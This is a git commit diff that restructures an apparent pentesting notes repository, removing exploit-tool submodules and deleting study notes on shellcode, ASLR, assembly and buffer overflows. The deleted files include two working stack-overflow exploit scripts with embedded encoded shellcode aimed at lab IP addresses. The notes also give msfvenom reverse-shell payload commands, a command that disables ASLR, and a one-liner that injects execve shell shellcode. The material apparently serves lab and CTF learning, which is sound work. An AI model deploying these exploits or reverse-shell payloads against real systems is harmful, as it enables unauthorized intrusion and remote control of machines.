restructured Exploits

This commit is contained in:
Stefan Friese 2022-11-13 22:51:45 +01:00
parent a1efefe7cf
commit b75bcb944f
175 changed files with 0 additions and 7069 deletions

72
.gitmodules vendored
View File

@ -13,9 +13,6 @@
[submodule "reverse_shells/One-Lin3r"] [submodule "reverse_shells/One-Lin3r"]
path = reverse_shells/One-Lin3r path = reverse_shells/One-Lin3r
url = https://github.com/D4Vinci/One-Lin3r.git url = https://github.com/D4Vinci/One-Lin3r.git
[submodule "exploit/web/php/Chankro"]
path = exploit/web/php/Chankro
url = https://github.com/TarlogicSecurity/Chankro.git
[submodule "enumeration/enumeration"] [submodule "enumeration/enumeration"]
path = enumeration/enumeration path = enumeration/enumeration
url = https://github.com/digininja/CeWL.git url = https://github.com/digininja/CeWL.git
@ -34,9 +31,6 @@
[submodule "enumeration/priv_esc/deepce"] [submodule "enumeration/priv_esc/deepce"]
path = enumeration/priv_esc/deepce path = enumeration/priv_esc/deepce
url = https://github.com/stealthcopter/deepce.git url = https://github.com/stealthcopter/deepce.git
[submodule "exploit/web/content_security_policy/JSONBee"]
path = exploit/web/content_security_policy/JSONBee
url = https://github.com/zigoo0/JSONBee.git
[submodule "post_exploitation/firefox_decrypt"] [submodule "post_exploitation/firefox_decrypt"]
path = post_exploitation/firefox_decrypt path = post_exploitation/firefox_decrypt
url = https://github.com/unode/firefox_decrypt.git url = https://github.com/unode/firefox_decrypt.git
@ -55,63 +49,30 @@
[submodule "reverse_shells/phpreverseshell"] [submodule "reverse_shells/phpreverseshell"]
path = reverse_shells/phpreverseshell path = reverse_shells/phpreverseshell
url = https://github.com/rootkral4/phpreverseshell.git url = https://github.com/rootkral4/phpreverseshell.git
[submodule "exploit/web/xxe/xxeserv"]
path = exploit/web/xxe/xxeserv
url = https://github.com/staaldraad/xxeserv.git
[submodule "reverse_engineering/SCDBG"] [submodule "reverse_engineering/SCDBG"]
path = reverse_engineering/SCDBG path = reverse_engineering/SCDBG
url = https://github.com/dzzie/SCDBG.git url = https://github.com/dzzie/SCDBG.git
[submodule "reverse_engineering/java/deobfuscator"] [submodule "reverse_engineering/java/deobfuscator"]
path = reverse_engineering/java/deobfuscator path = reverse_engineering/java/deobfuscator
url = https://github.com/java-deobfuscator/deobfuscator.git url = https://github.com/java-deobfuscator/deobfuscator.git
[submodule "exploit/windows/CrackMapExec"]
path = exploit/windows/CrackMapExec
url = https://github.com/byt3bl33d3r/CrackMapExec.git
[submodule "telecommunications/sipvicious"] [submodule "telecommunications/sipvicious"]
path = telecommunications/sipvicious path = telecommunications/sipvicious
url = https://github.com/EnableSecurity/sipvicious.git url = https://github.com/EnableSecurity/sipvicious.git
[submodule "exploit/windows/PrintNightmare"] [submodule "exploit/windows/PrintNightmare"]
path = exploit/windows/PrintNightmare path = exploit/windows/PrintNightmare
url = https://github.com/ly4k/PrintNightmare.git url = https://github.com/ly4k/PrintNightmare.git
[submodule "exploit/web/php/phpggc"]
path = exploit/web/php/phpggc
url = https://github.com/ambionics/phpggc.git
[submodule "post_exploitation/priv_esc/sucrack"] [submodule "post_exploitation/priv_esc/sucrack"]
path = post_exploitation/priv_esc/sucrack path = post_exploitation/priv_esc/sucrack
url = https://github.com/hemp3l/sucrack.git url = https://github.com/hemp3l/sucrack.git
[submodule "exploit/java/JNDI-Exploit-Kit"]
path = exploit/java/JNDI-Exploit-Kit
url = https://github.com/pimps/JNDI-Exploit-Kit.git
[submodule "exploit/binaries/buffer_overflow/ropstar"]
path = exploit/binaries/buffer_overflow/ropstar
url = https://github.com/xct/ropstar.git
[submodule "exploit/java/log4j-scan"]
path = exploit/java/log4j-scan
url = https://github.com/fullhunt/log4j-scan.git
[submodule "exploit/windows/printspoofer"] [submodule "exploit/windows/printspoofer"]
path = exploit/windows/printspoofer path = exploit/windows/printspoofer
url = https://github.com/dievus/printspoofer.git url = https://github.com/dievus/printspoofer.git
[submodule "post_exploitation/powershell"] [submodule "post_exploitation/powershell"]
path = post_exploitation/powershell path = post_exploitation/powershell
url = https://github.com/puckiestyle/powershell.git url = https://github.com/puckiestyle/powershell.git
[submodule "exploit/macOS/ds_store_exp"]
path = exploit/macOS/ds_store_exp
url = https://github.com/lijiejie/ds_store_exp.git
[submodule "exploit/macOS/DS_Store_crawler_parser"]
path = exploit/macOS/DS_Store_crawler_parser
url = https://github.com/anantshri/DS_Store_crawler_parser.git
[submodule "exploit/macOS/Python-dsstore"]
path = exploit/macOS/Python-dsstore
url = https://github.com/gehaxelt/Python-dsstore.git
[submodule "post_exploitation/armitage"] [submodule "post_exploitation/armitage"]
path = post_exploitation/armitage path = post_exploitation/armitage
url = https://gitlab.com/kalilinux/packages/armitage.git url = https://gitlab.com/kalilinux/packages/armitage.git
[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
[submodule "exploit/padding/PadBuster"]
path = exploit/padding/PadBuster
url = https://github.com/AonCyberLabs/PadBuster.git
[submodule "post_exploitation/bc_security/Empire"] [submodule "post_exploitation/bc_security/Empire"]
path = post_exploitation/bc_security/Empire path = post_exploitation/bc_security/Empire
url = https://github.com/BC-SECURITY/Empire.git url = https://github.com/BC-SECURITY/Empire.git
@ -121,33 +82,6 @@
[submodule "misc/bruteforce/patator"] [submodule "misc/bruteforce/patator"]
path = misc/bruteforce/patator path = misc/bruteforce/patator
url = https://github.com/lanjelot/patator.git url = https://github.com/lanjelot/patator.git
[submodule "exploit/samba/smbmap"]
path = exploit/samba/smbmap
url = https://github.com/ShawnDEvans/smbmap.git
[submodule "exploit/web/beef"]
path = exploit/web/beef
url = https://github.com/beefproject/beef.git
[submodule "exploit/web/jwt/jwt-cracker"]
path = exploit/web/jwt/jwt-cracker
url = https://github.com/lmammino/jwt-cracker.git
[submodule "exploit/web/jwt/jwt_tool"]
path = exploit/web/jwt/jwt_tool
url = https://github.com/ticarpi/jwt_tool.git
[submodule "exploit/web/ssti/tplmap"]
path = exploit/web/ssti/tplmap
url = https://github.com/epinna/tplmap.git
[submodule "exploit/windows/impacket"]
path = exploit/windows/impacket
url = https://github.com/SecureAuthCorp/impacket.git
[submodule "exploit/windows/windows-kernel-exploits"]
path = exploit/windows/windows-kernel-exploits
url = https://github.com/SecWiki/windows-kernel-exploits.git
[submodule "exploit/PayloadsAllTheThings"]
path = exploit/PayloadsAllTheThings
url = https://github.com/swisskyrepo/PayloadsAllTheThings.git
[submodule "exploit/GitTools"]
path = exploit/GitTools
url = https://github.com/internetwache/GitTools
[submodule "misc/level3_hypervisor/docker_sec/dive"] [submodule "misc/level3_hypervisor/docker_sec/dive"]
path = misc/level3_hypervisor/docker_sec/dive path = misc/level3_hypervisor/docker_sec/dive
url = https://github.com/wagoodman/dive.git url = https://github.com/wagoodman/dive.git
@ -169,9 +103,3 @@
[submodule "reverse_shells/windows/evil-winrm"] [submodule "reverse_shells/windows/evil-winrm"]
path = reverse_shells/windows/evil-winrm path = reverse_shells/windows/evil-winrm
url = https://github.com/Hackplayers/evil-winrm.git url = https://github.com/Hackplayers/evil-winrm.git
[submodule "exploit/level3_hypervisor/docker_sec/dive"]
path = exploit/level3_hypervisor/docker_sec/dive
url = https://github.com/wagoodman/dive.git
[submodule "exploit/level3_hypervisor/kubeletctl"]
path = exploit/level3_hypervisor/kubeletctl
url = https://github.com/cyberark/kubeletctl.git

View File

@ -1,26 +0,0 @@
# Meltdown
* [PoC from IAIK](https://github.com/IAIK/meltdown.git)
![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown")
* Each page table entries has the following flag values
* SUP (user or kernel mode)
* READ
* WRITE
* Flags are checked by the MMU
* Pipelined steps of an instruction are the following
* Fetch
* Decode
* Execute
* Memory access
* Register write back
* A pipeline can execute one of each steps concurrently every clock cycle.
* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls.
* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline.
* If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end.
* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown.

@ -1 +0,0 @@
Subproject commit 7cac63a2c141cdf2ab0f854e790ace3f430304f4

@ -1 +0,0 @@
Subproject commit 7fe0a0475eebc544f0c469e7a89030c6b4fecf31

View File

@ -1,107 +0,0 @@
## Shellcode
* [linux syscalls](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) Are used to craft the shellcode in assembly language
* [asmtutor.com](https://asmtutor.com) to check the assembly
## Staged and Unstaged Payloads
* An unstaged payload is directly embedded in a binary and executes as is. This may be used to start malicious payload which does not need a remote connection or nearly none.
* A small stub of the staged payload is embedded in the binary and should load additional instructions from remote which build the final reverse shell. The downloaded part will only reside in memory. The downloaded shellcode can be changed
## Writing Shellcode Manually
* Executing the shellcode relies on syscalls of the system
* A 32 bit version looks like this
```assembly
SECTION .data
msg db 'Hello World!', 0Ah
SECTION .text
global _start
_start:
mov edx, 13
mov ecx, msg
mov ebx, 1
mov eax, 4
int 80h
mov ebx, 0 ; return 0 status on exit - 'No Errors'
mov eax, 1 ; invoke SYS_EXIT (kernel opcode 1)
int 80h
```
* A 64 bit version looks like this
```assembly
global _start
section .text
_start:
jmp MESSAGE
OUTPUT:
mov rax, 0x1
mov rdi, 0x1
pop rsi
mov rdx, 0xd
syscall
mov rax, 0x3c
mov rdi, 0x0
syscall
MESSAGE:
call OUTPUT
db "Hello, world!", 0dh, 0ah
```
### Compilation
* Compile and link 32 bit
```sh
nasm -f elf helloworld.asm
ld -m elf_i386 helloworld.o -o helloworld
```
* Compile and link 64 bit
```sh
nasm -f elf64 helloworld.asm
ld helloworld.o -o helloworld
```
### Dump the binary
* Dump the binary with `objdump -d helloworld` and take a look at the text section
* Dump the text section into a file via
```sh
objcopy -j .text -O binary helloworld helloworld.text
```
### Format the Shellcode
* Format and test the code by dumping it into a c file
```
xxd -i helloworld.text > helloworld.c
sed -i '1s/^/#include<stdio.h>\n\n/' helloworld.c
echo -e "\n\t(*(void(*)())helloworld_text)();\n\treturn 0;\n}" >> helloworld.c
```
* Compile the c file with an exectuable stack
```sh
gcc -z execstack -g -o helloworld helloworld.c
```
## Automated Shellcode Generation
* Automate the creation via msfvenom
* Staged payloads look like this
```sh
msfvenom -p linux/x64/meterpreter/reverse_tcp
```
* Stageless payloads look like this
```sh
msfvenom -p linux/x64/meterpreter/reverse_tcp
```

View File

@ -1,15 +0,0 @@
# ASLR
## System Status
* `0`, No randomization
* `1`, Conservative, `*.so`, stack, `mmap`, VDSO and heap
* `2`, full randomization
## Disable
```sh
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

View File

@ -1,8 +0,0 @@
#!/usr/bin/env python3
from __future__ import print_function
listRem = "\\x0a".split("\\x")
for x in range(1, 256):
if "{:02x}".format(x) not in listRem:
print("\\x" + "{:02x}".format(x), end='')
print()

View File

@ -1,65 +0,0 @@
import sys
import socket
badchars = bytearray()
listRem = [0x00]
for x in range(1, 256):
if x not in listRem:
badchars.append(x)
buf = b""
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
ip = "10.10.143.77"
port = 9999
offset = 2012
overflow = b"A" * offset
retn = b"\xdf\x14\x50\x62" #"BBBB"
padding = b"\x90" * 16
payload = buf
postfix = b""
buffer = overflow + retn + padding + payload + postfix
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(2000)
s.send(b"pwnbot")
s.recv(2000)
print("Sending evil buffer...")
s.send(buffer)
print("Done!")
s.close()
except socket.error:
print("Could not connect: "+socket.error)

View File

@ -1,54 +0,0 @@
#!/usr/bin/env python3
import socket
ip = "10.10.122.155"
port = 31337
prefix = ""
offset = 146
overflow = "A" * offset
# EIP return
#retn = "BBBB"
retn = "\xc3\x14\x04\x08"
padding = "\x90" * 16
#padding = ""
#payload = ""
payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4"
payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1"
payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44"
payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b"
payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5"
payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c"
payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb"
payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc"
payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b"
payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a"
payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66"
payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a"
payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34"
payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97"
payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a"
payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45"
payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93"
payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66"
payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29"
payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3"
payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb"
payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89"
payload += "\xef\xd9\x08\x3d\x0f\xc8";
#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("[*] Sending buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect")

View File

@ -1,56 +0,0 @@
# amd64
* `rax` return value, caller saved.
* `rbx` base register (used for mem basepointer)
* `rcx` counter register
* `r10`, `r11` are caller saved.
* `rbx`, `r12`, `r13`, `r14` are callee saved
* `rdx` data register
* `rbp` is also callee saved(and can be optionally used as a frame pointer)
* `rsp` is callee saved
* `rip` next instruction pointer
## Function argument registers
* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved.
* Further function args are stored inside its stack frame.
## Overwriting Variables and Padding
* Overwrite an atomic variable behind a buffer
```C
int main ( int argc, char ** argv ) {
int var = 0
char buffer[12];
gets(buffer);
[...]
}
```
* Stack layout
```
Bottom
+------------------+
| Saved registers |
+------------------+
| int var |
+------------------+
| char buffer [11] |
| ... |
| ... |
| ... |
| char buffer [0] |
+------------------+
| char ** argv |
+------------------+
| char argc |
+------------------+
Top
```
* Watch out! I.e., a 12 byte array is padded to system memory allocation size.
```
+-------------+----+
|12 byte array| 4b |
+-------------+----+
0 12 16 byte
```

View File

@ -1,77 +0,0 @@
# amd64 instructions
* `;` starts a comment
## Values
* __Immediate__, numbers
* __register__, existing registers
* __memory__, memory addresses
## Move
* `MOV`, from source to destination
* `LEA`, loads memory address and stores it in the destination. Address can have an offset. Does not dereference `[var]` or `[var+x]`
* `PUSH` & `POP`, put & delete registers to/from stack.
## Arithmetic
* `INC`, increment
* `DEC`, decrement
* `ADD`
* `SUB`, substracts source from dest and stores in dest
* `MUL` & `IMUL`, result may be stored in upper and lower halfs (rdx:rax)
* `DIV` & `IDIV`, rax is divided by rbx and may be stored in two halfs as well
## Conditionals
* `RET`, return value to the caller
* `CMP`, compare two values and sets flag. Next instruction is a jump condition to a line number. Works as follows
* `JE`, `JEZ`, `JLE` ... followed by linenumber
* `NOP`, `\x90`
* `CALL` a function
## Address Handling
* `[var]`, memory address of var.
* If var contains an address then after `mov [var], 42` var points to the value 42. `[` dereference.
## Zero Handling in Registers
* Move to `eax` will result in zeroing the upper 32 bit of an `rax` register, move to `ax`, `ah`, `al` will not.
* `MOVZX` zeros anything but the value moved to the register inside of it.
## Jumps
* For signed value comparison
* `JL/JNGE` (SF <> OF) ; Jump if less/not greater or equal
* `JGE/JNL` (SF = OF) ; Jump if greater or equal/not less
* `JLE/JNG` (ZF = 1 or SF <> OF); Jump if less or equal/not greater
* `JG/JNLE` (ZF = 0 and SF = OF); Jump if greater/not less or equal
* For unsigned value comparison
* `JB/JNAE` (CF = 1) ; Jump if below/not above or equal
* `JAE/JNB` (CF = 0) ; Jump if above or equal/not below
* `JBE/JNA` (CF = 1 or ZF = 1) ; Jump if below or equal/not above
* `JA/JNBE` (CF = 0 and ZF = 0); Jump if above/not below or equal
## Flags
* `eflags` 32bit
* `rflags` 64bit
### Status
* __Zero Flag__ (ZF), 1 if the result of the comparison is equal.
* __Carry Flag__ (CF), a 1 is stored if a carry is needed after a calculation.
* __Overflow Flag__ (OF), register overflow is 1
* __Sign Flag__ (SF), 1 if result is negative.
* __Adjust/Auxiliary Flag__ (AF), carry flag for BCD.
* __Parity Flag__ (PF), 1 if the last 8 bits are even.
* __Trap Flag__ (TF)
## Calling Conventions
## cdecl
## fastcall
* First four are passed __left to right__
* int -> RCX, RDX, R8, R9
* float -> XMM0, XMM1, XMM2, XMM3
* Rest is __right to left__
* Basepointer is saved by the caller
* Return values is passes via `rax` or `xmm0`
* Caller allocates space for at least four values, so 32 bytes are reserved. `$rsp to $rsp+0x18`
* Volatile registers are `rax, rcx, r8, r9, r10, r11, xmm0, xmm1, xmm2, xmm3, xmm4, xmm5`. These are destroyed after function call.
* Nonvolatile registers are `rbx, rbp, rdi, rsi, rsp, r12, r13, r14, r15, xmm6-15` ares saved and restored after function call.

View File

@ -1,66 +0,0 @@
# Buffer Overflow
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
# Usage
* Fuzz & crash the binary pretty roughly via payload
```sh
python -c "print('A' * 3000)
```
## Fuzzing
* python 3
../fuzzer.py
* python 2
../fuzzer2.py
## Measure Offset
* Use as payload
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
```
* Find content of the payload at EIP and identify exact bufferlength
```sh
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
```
```
msf-pattern_offset -l <bufferlength> -q <EIP>
```
```
mona msfpattern -l <bufferlength>
```
* Fill offset variable in exploit `buffer_overflow.py`
../buffer_overflow.py
* Execute buffer_overflow.py, EIP should contain `BBBB`
## Find bad characters to input in the buffer
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
../bad_chars.py
* Compare stack if any bad chars block exectuion of the payload following in the next steps.
```sh
!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>
```
## Find Jump Point / RoP
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
### Example: Immunity Debugger using mona on windows machine
```sh
!mona modules
```
```sh
!mona jmp -r esp -m <exploitable_bin_from_modules>
```
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
## Shellcode as Payload
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
```
* Prepend NOPs as padding before shellcode

View File

@ -1,32 +0,0 @@
# Cut Stack in Half + NOPsled
* Stack has to be executable
* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard
## shellcraft
* for example
```sh
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
```
## Usage
* measure `eip` offset via
```sh
cyclic <number>
```
* Check eip content via gdb
```sh
cyclic -l <eipContent>
```
* Example code
```python
from pwn import *
padding(cyclic(cyclic_find(<eipContent>))
eip = p32(<esp> + some offset into stack)
sled = 90 * 100
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode
```

View File

@ -1,15 +0,0 @@
# pwntools
## Memory Addresses of ELF Binary
* Find address of function and use it on $eip
```python
p = process(<binary>)
elf = ELF(<binary>)
__function = elf.symbol.<functionName>
payload = fit({
42: __function # Length measured via cyclic
})
p.sendline()
proc.interactive()
```

View File

@ -1,121 +0,0 @@
# Return Address reuse
## via Shellcode, an examples
* Find out the address of the start of the buffer and the start address of the return address
* Calculate the difference between these addresses so you know how much data to enter to overflow
* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
* Plus NOPsled (sometimes xargs is needed in front of the app call)
```python
python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow
```
## Finding Offset
### via gdb segfault output
* 64 bit addresses use 6 out of 8 byte for addresses.
```sh
gdb ./application
run $(python -c "print('\x41' * 180)")
```
* Return address hit completely when 6 bytes are filled.
```sh
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in copy_arg ()
```
* Buffer = measured_length - (`$rbp` + 6 bytes return address)
### via metasploit
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l 180
```
* Looking for `rbp` Content in front of the return address to measure offset
```sh
(gdb) i r
[...]
rbp 0x<rbpAddress> 0x<rbpConent>
[...]
```
* Measure offset
```sh
pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
```
## Crafting Payload
* Contains Junk/NOPslice + shellcode + Junk over rbp + return address
* Inside gdb
```sh
run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
```
* Check actual stack
```sh
(gdb) x/100x $rsp-200
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141
0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
[...]
```
* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
## NopSled
* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
```sh
(gdb) x/100x $rsp-200
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090
0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
```
